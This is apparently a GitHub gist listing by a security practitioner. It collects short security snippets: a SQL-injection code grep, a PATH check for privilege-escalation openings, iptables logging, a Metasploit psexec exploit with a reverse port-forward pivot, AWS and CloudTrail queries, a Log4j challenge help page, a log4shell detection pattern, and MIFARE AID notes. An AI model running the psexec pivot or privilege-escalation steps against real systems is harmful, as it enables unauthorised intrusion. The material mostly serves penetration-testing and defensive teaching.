Joshua Wright joswr1ght
@joswr1ght
joswr1ght / extract-tlsscan-hostnames.py
Last active October 18, 2025 02:58
Extract TLS-Scan Hostnames from Certificate Records
#!/usr/bin/env python3
# Mark Baggett @MarkBaggett graciously wrote this script.
# Minor changes by Joshua Wright @joswr1ght.
# Use it to retrieve host name information from the JSON output of tls-scan
# (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName
# fields.
import json
import re
import sys
@joswr1ght
joswr1ght / heinous-shell-sqli-scanner.sh
Created March 16, 2021 18:55
SQL Injection Vulnerable Code Scanning Shell Command
# This heinous command searches for SQL injection vulnerable code:
# 1. Use awk to convert multiline strings into a single line
# 2. Fix things up with sed to make line endings normal again
# 3. Search for SQL-related statements
# 4. Search for lines where there are two or more $ variable indicators
#
# This is a hack. Please don't let this be my legacy.
#
awk -F"\"" '!$NF{ print; next }{ printf("%s ", $0) }' *.php | sed 's/;/;\n/g;s/}/}\n/g' | grep -iE "select|insert|update|delete" | grep -E "\\$.*\\$"
@joswr1ght
joswr1ght / check-privesc-writable-dirs.sh
Created March 31, 2021 14:31
Check PATH for Writable Directories for Privesc Opportunity
IFS=:; set -o noglob; for dir in $PATH""; do ls -ld $dir; done
@joswr1ght
joswr1ght / iptables-connect-logging.sh
Created May 10, 2021 11:18
Linux server-side connection logging
# Create a chain that logs new connections:
iptables -N LOGNEW
iptables -A LOGNEW -j LOG --log-prefix ' INBOUND TCP ' --log-level 4
iptables -A LOGNEW -j ACCEPT
# Accept packets on existing connections without any fuss:
iptables -A INPUT -p tcp -m state \! --state NEW -j ACCEPT
# Log incoming packets on new connections:
iptables -A INPUT -p tcp -j LOGNEW -m limit --limit 100/sec
# Examine logs
@joswr1ght
joswr1ght / intermediate-forwarder.met
Created May 21, 2021 16:36
Setup Intermediate Forwarder for Metasploit Callback
use exploit/windows/smb/psexec
set RHOST 10.10.10.10
set SMBUSER falken
set SMBPASS joshua
set LHOST tap0
show options
exploit
portfwd add -R -L 127.0.0.1 -l 4444 -p 4444
bg
route add 10.10.10.20/32 1
@joswr1ght
joswr1ght / youwillnotbestmejq.sh
Last active July 29, 2021 18:54
Get Name and IP address from EC2 instances
$ aws --profile falsimentis --region us-west-1 ec2 describe-instances | jq -jr '.Reservations[] | .Instances[] | "\"", (.PublicIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
"54.183.200.32":"Web Server 3",
"13.56.160.248":"VPC NAT Backup",
"13.57.148.101":"VPC NAT",
"54.153.36.229":"Dev Webserver",
"52.52.159.114":"Web Server 2",
"null":"DB Server 1",
"54.241.78.206":"Web Server 1",
"54.219.245.27":"Web Server 4",
$ cat ec2-describe-instances.json | jq -jr '.Reservations[] | .Instances[] | "\"", (.NetworkInterfaces[] | .PrivateIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
@joswr1ght
joswr1ght / ctsummarize.sh
Created November 10, 2021 14:08
ctsummarize: Create Multiple Output Files From CloudTrail Activity for Analysis
#!/bin/bash
REQUIREDUTILS="jq zcat mktemp sort uniq rm"
# Run program and test exit status to ensure success
function runtst {
"$@"
local status=$?
if (( status != 0 )); then
echo "error running command" >&2
@joswr1ght
joswr1ght / HELP.md
Last active November 25, 2022 18:32
Log4Jack Bonus Help

Yule Log4Jack Help

Hi, Josh Wright here. I'm the technical director for the Holiday Hack Challenge. We don't normally break the 4th wall like this, but we think this Log4j vulnerability calls for special measures to give you the information you need to assess, identify, and mitigate this vulnerability.

In this challenge, Icky McGoop asks for your help in exploiting a Java Solr server at http://solrpower.kringlecastle.com:8983. This server is vulnerable to the Log4shell vulnerability. Your goal is to exploit the server and get a

@joswr1ght
joswr1ght / logshell-search.sh
Created December 20, 2021 19:56
Search for log4shell attack patterns
#!/bin/sh
# Specify a starting directory as the first command-line argument to search for
# log4shell-style attack patterns. The directory argument is quoted so paths
# containing spaces are searched correctly.
grep -E -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' "$1"
@joswr1ght
joswr1ght / mifare-desfire-aid-mapping.md
Last active February 24, 2022 20:02
MIFARE DESFire AID Mapping

MIFARE DESFire AID Mapping

Entered here for posterity and so I don't have to search for this ever again.

The MIFARE DESFire Application Identifier (AID) is a 3-byte value that identifies an application on the card; each application in turn holds the card's files. A 2-byte MIFARE Classic AID structure can be adapted for use as an expanded 3-byte MIFARE DESFire AID.

https://www.nxp.com/docs/en/application-note/AN10787.pdf

A 2-byte MIFARE Classic AID adapted to MIFARE DESFire uses a leading nibble of 0xf and a trailing nibble in the range 0x0 - 0xf. The middle 2 bytes are the MIFARE Classic AID. For example, 0x7009 is the Timelox AB MIFARE Classic AID; 0xf7009x is the adapted AID for MIFARE DESFire.
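The mapping above, as an added example (not part of the gist): convert a 2-byte Classic AID into its 3-byte DESFire form and back, and classify an arbitrary DESFire AID seen during a card inventory as either an adapted Classic AID or a native one. Function names are my own; the Timelox AB value is the one from the note.

```python
# Added example (not from the gist): Classic <-> DESFire AID conversion using
# the layout the note describes: leading nibble 0xF, the 16-bit Classic AID
# in the middle, and a trailing nibble 0x0-0xF that distinguishes up to 16
# DESFire applications derived from the same Classic AID.

CLASSIC_AID_PREFIX = 0xF  # leading nibble that marks an adapted Classic AID


def classic_to_desfire_aid(classic_aid: int, suffix: int = 0) -> int:
    """Return the 3-byte DESFire AID 0xF<classic_aid><suffix>."""
    if not 0 <= classic_aid <= 0xFFFF:
        raise ValueError("MIFARE Classic AID must fit in 2 bytes")
    if not 0 <= suffix <= 0xF:
        raise ValueError("suffix nibble must be 0x0-0xF")
    return (CLASSIC_AID_PREFIX << 20) | (classic_aid << 4) | suffix


def desfire_to_classic_aid(desfire_aid: int):
    """Split a DESFire AID into (classic_aid, suffix), or return None when the
    leading nibble is not 0xF (i.e. it is not an adapted Classic AID)."""
    if not 0 <= desfire_aid <= 0xFFFFFF:
        raise ValueError("MIFARE DESFire AID must fit in 3 bytes")
    if (desfire_aid >> 20) != CLASSIC_AID_PREFIX:
        return None
    return ((desfire_aid >> 4) & 0xFFFF, desfire_aid & 0xF)


def describe_aid(desfire_aid: int) -> str:
    """One-line summary suitable for a card inventory listing."""
    mapping = desfire_to_classic_aid(desfire_aid)
    if mapping is None:
        return f"{desfire_aid:06X}: native DESFire AID"
    classic, suffix = mapping
    return (f"{desfire_aid:06X}: adapted from Classic AID {classic:04X} "
            f"(instance {suffix:X})")


if __name__ == "__main__":
    # Timelox AB Classic AID 0x7009 from the note, plus a constructed native AID.
    for aid in (classic_to_desfire_aid(0x7009), 0xF7009A, 0x000001):
        print(describe_aid(aid))
```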